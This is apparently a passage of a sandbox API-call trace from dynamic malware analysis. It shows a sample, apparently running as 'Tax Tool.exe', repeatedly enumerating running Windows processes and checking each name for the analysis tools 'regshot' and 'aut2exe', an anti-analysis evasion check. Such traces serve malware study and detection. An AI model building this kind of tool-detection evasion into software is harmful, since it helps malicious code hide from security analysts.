[0056.087] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.088] StrStrIW (lpFirst="svchost.exe", lpSrch="regshot") returned 0x0 [0056.088] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0056.088] StrStrIW (lpFirst="spoolsv.exe", lpSrch="regshot") returned 0x0 [0056.088] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.089] StrStrIW (lpFirst="svchost.exe", lpSrch="regshot") returned 0x0 [0056.089] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x550, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.090] StrStrIW (lpFirst="svchost.exe", lpSrch="regshot") returned 0x0 [0056.090] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0056.090] StrStrIW (lpFirst="sihost.exe", lpSrch="regshot") returned 0x0 [0056.090] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x728, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0056.091] StrStrIW (lpFirst="taskhostw.exe", lpSrch="regshot") returned 0x0 [0056.091] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0056.092] StrStrIW (lpFirst="explorer.exe", lpSrch="regshot") returned 0x0 [0056.092] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0056.092] StrStrIW (lpFirst="RuntimeBroker.exe", lpSrch="regshot") returned 0x0 [0056.092] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0056.093] StrStrIW (lpFirst="ShellExperienceHost.exe", lpSrch="regshot") returned 0x0 [0056.093] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0056.094] StrStrIW (lpFirst="SearchUI.exe", lpSrch="regshot") returned 0x0 [0056.094] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.094] StrStrIW (lpFirst="svchost.exe", lpSrch="regshot") returned 0x0 [0056.094] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x320, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0056.095] StrStrIW (lpFirst="UsoClient.exe", lpSrch="regshot") returned 0x0 [0056.095] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x320, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0056.096] StrStrIW (lpFirst="taskhostw.exe", lpSrch="regshot") returned 0x0 [0056.096] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0056.096] StrStrIW (lpFirst="WMIADAP.exe", lpSrch="regshot") returned 0x0 [0056.096] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0056.097] StrStrIW (lpFirst="sppsvc.exe", lpSrch="regshot") returned 0x0 [0056.097] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x718, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.098] StrStrIW (lpFirst="conhost.exe", lpSrch="regshot") returned 0x0 [0056.098] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x414, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0056.098] StrStrIW (lpFirst="backgroundTaskHost.exe", lpSrch="regshot") returned 0x0 [0056.098] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0056.099] StrStrIW (lpFirst="backgroundTaskHost.exe", lpSrch="regshot") returned 0x0 [0056.099] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0056.100] StrStrIW (lpFirst="WmiPrvSE.exe", lpSrch="regshot") returned 0x0 [0056.100] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0056.100] StrStrIW (lpFirst="dllhost.exe", lpSrch="regshot") returned 0x0 [0056.100] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0056.101] StrStrIW (lpFirst="audiodg.exe", lpSrch="regshot") returned 0x0 [0056.101] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.102] StrStrIW (lpFirst="svchost.exe", lpSrch="regshot") returned 0x0 [0056.102] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0056.104] StrStrIW (lpFirst="dllhost.exe", lpSrch="regshot") returned 0x0 [0056.104] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0056.104] StrStrIW (lpFirst="dllhost.exe", lpSrch="regshot") returned 0x0 [0056.104] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x990, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="Tax Tool.exe")) returned 1 [0056.105] StrStrIW (lpFirst="Tax Tool.exe", lpSrch="regshot") returned 0x0 [0056.105] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0056.106] StrStrIW (lpFirst="taskhostw.exe", lpSrch="regshot") returned 0x0 [0056.106] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 0 [0056.107] CloseHandle (hObject=0x1e0) returned 1 [0056.107] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e0 [0056.111] Process32FirstW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0056.112] StrStrIW (lpFirst="[System Process]", lpSrch="aut2exe") returned 0x0 [0056.112] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0056.162] StrStrIW (lpFirst="System", lpSrch="aut2exe") returned 0x0 [0056.162] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0056.162] StrStrIW (lpFirst="smss.exe", lpSrch="aut2exe") returned 0x0 [0056.162] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0056.163] StrStrIW (lpFirst="csrss.exe", lpSrch="aut2exe") returned 0x0 [0056.163] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0056.163] StrStrIW (lpFirst="wininit.exe", lpSrch="aut2exe") returned 0x0 [0056.163] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0056.164] StrStrIW (lpFirst="csrss.exe", lpSrch="aut2exe") returned 0x0 [0056.164] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0056.165] StrStrIW (lpFirst="winlogon.exe", lpSrch="aut2exe") returned 0x0 [0056.165] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0056.166] StrStrIW (lpFirst="services.exe", lpSrch="aut2exe") returned 0x0 [0056.166] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0056.166] StrStrIW (lpFirst="lsass.exe", lpSrch="aut2exe") returned 0x0 [0056.166] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.167] StrStrIW (lpFirst="svchost.exe", lpSrch="aut2exe") returned 0x0 [0056.167] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.168] StrStrIW (lpFirst="svchost.exe", lpSrch="aut2exe") returned 0x0 [0056.168] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c4, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0056.168] StrStrIW (lpFirst="dwm.exe", lpSrch="aut2exe") returned 0x0 [0056.168] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.169] StrStrIW (lpFirst="svchost.exe", lpSrch="aut2exe") returned 0x0 [0056.169] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.169] StrStrIW (lpFirst="svchost.exe", lpSrch="aut2exe") returned 0x0 [0056.169] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x354, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.170] StrStrIW (lpFirst="svchost.exe", lpSrch="aut2exe") returned 0x0 [0056.170] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.170] StrStrIW (lpFirst="svchost.exe", lpSrch="aut2exe") returned 0x0 [0056.171] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.171] StrStrIW (lpFirst="svchost.exe", lpSrch="aut2exe") returned 0x0 [0056.171] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.172] StrStrIW (lpFirst="svchost.exe", lpSrch="aut2exe") returned 0x0 [0056.172] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0056.172] StrStrIW (lpFirst="spoolsv.exe", lpSrch="aut2exe") returned 0x0 [0056.172] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.173] StrStrIW (lpFirst="svchost.exe", lpSrch="aut2exe") returned 0x0 [0056.173] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x550, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.173] StrStrIW (lpFirst="svchost.exe", lpSrch="aut2exe") returned 0x0 [0056.174] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0056.174] StrStrIW (lpFirst="sihost.exe", lpSrch="aut2exe") returned 0x0 [0056.174] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x728, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0056.175] StrStrIW (lpFirst="taskhostw.exe", lpSrch="aut2exe") returned 0x0 [0056.175] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0056.175] StrStrIW (lpFirst="explorer.exe", lpSrch="aut2exe") returned 0x0 [0056.175] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0056.176] StrStrIW (lpFirst="RuntimeBroker.exe", lpSrch="aut2exe") returned 0x0 [0056.176] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0056.176] StrStrIW (lpFirst="ShellExperienceHost.exe", lpSrch="aut2exe") returned 0x0 [0056.176] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0056.177] StrStrIW (lpFirst="SearchUI.exe", lpSrch="aut2exe") returned 0x0 [0056.177] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.178] StrStrIW (lpFirst="svchost.exe", lpSrch="aut2exe") returned 0x0 [0056.178] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x320, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0056.178] StrStrIW (lpFirst="UsoClient.exe", lpSrch="aut2exe") returned 0x0 [0056.178] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x320, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0056.179] StrStrIW (lpFirst="taskhostw.exe", lpSrch="aut2exe") returned 0x0 [0056.179] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0056.179] StrStrIW (lpFirst="WMIADAP.exe", lpSrch="aut2exe") returned 0x0 [0056.179] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0056.180] StrStrIW (lpFirst="sppsvc.exe", lpSrch="aut2exe") returned 0x0 [0056.180] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x718, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.184] StrStrIW (lpFirst="conhost.exe", lpSrch="aut2exe") returned 0x0 [0056.184] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x414, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0056.185] StrStrIW (lpFirst="backgroundTaskHost.exe", lpSrch="aut2exe") returned 0x0 [0056.185] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0056.185] StrStrIW (lpFirst="backgroundTaskHost.exe", lpSrch="aut2exe") returned 0x0 [0056.185] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0056.186] StrStrIW (lpFirst="WmiPrvSE.exe", lpSrch="aut2exe") returned 0x0 [0056.186] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0056.186] StrStrIW (lpFirst="dllhost.exe", lpSrch="aut2exe") returned 0x0 [0056.187] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0056.187] StrStrIW (lpFirst="audiodg.exe", lpSrch="aut2exe") returned 0x0 [0056.187] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.188] StrStrIW (lpFirst="svchost.exe", lpSrch="aut2exe") 